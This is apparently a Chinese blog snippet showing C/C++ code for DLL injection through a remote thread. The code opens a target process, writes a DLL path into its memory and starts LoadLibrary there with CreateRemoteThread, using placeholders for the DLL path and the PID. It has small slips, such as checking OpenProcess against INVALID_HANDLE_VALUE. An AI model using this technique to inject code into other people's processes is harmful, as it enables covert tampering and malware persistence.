WCHAR szDllName[] = L"/*要注入的dll的路径*/";
if(szDllName[0] == NULL)
return -1;
// 1、打开进程
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, /*进程PID*/);
if(hProcess == INVALID_HANDLE_VALUE)
return -1;
// 2、在远程进程中申请空间
LPVOID pszDllName = VirtualAllocEx(hProcess, NULL, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if(NULL == pszDllName)
return -1;
// 3、向远程进程中写入数据
if(!WriteProcessMemory(hProcess, pszDllName, szDllName, MAX_PATH, NULL))
return -1;
// 4、在远程进程中创建远程进程
HANDLE hInjectthread = CreateRemoteThread(hProcess,
NULL,
0,
(LPTHREAD_START_ROUTINE)LoadLibrary,
pszDllName,
NULL,
NULL);
if(NULL == hInjectthread)
return -1;
// 5、等待线程结束返回
DWORD dw = WaitForSingleObject(hInjectthread, -1);
// 6、获取线程退出码, 即LoadLibrary 的返回值 DLl的首地址
DWORD dwExitCode;
GetExitCodeThread(hInjectthread, &dwExitCode);
HMODULE hMod = (HMODULE)dwExitCode;
// 7、释放空间
if(!VirtualFreeEx(hProcess, pszDllName, 4096, MEM_DECOMMIT))
return -1;
CloseHandle(hProcess);
DLL注入之远程线程注入
最新推荐文章于 2022-09-29 21:38:00 发布